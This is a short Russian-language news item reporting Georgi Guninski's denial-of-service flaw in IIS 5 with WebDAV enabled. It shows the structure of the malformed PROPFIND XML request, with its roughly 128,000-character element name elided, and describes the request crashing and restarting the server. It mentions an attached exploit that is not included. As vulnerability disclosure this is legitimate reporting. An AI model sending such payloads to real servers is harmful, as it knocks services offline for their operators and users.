Знаменитый Georgi Guninski
обнаружил очередную DoS дырку в IIS 5 с
включенным WebDAV. Длинный запрос типа
следующего:

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a
:prop><a:displayname
/><u:<около 128008 символов>/></a:prop>
</a:propfind>

в первый раз вызовет ошибку с кодом 500, а во
второй перезапустит IIS (в случае Windows 2000 IIS
так же пожрет немерено памяти и
процессорного времени)
.

Эксплоит прилагаю.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии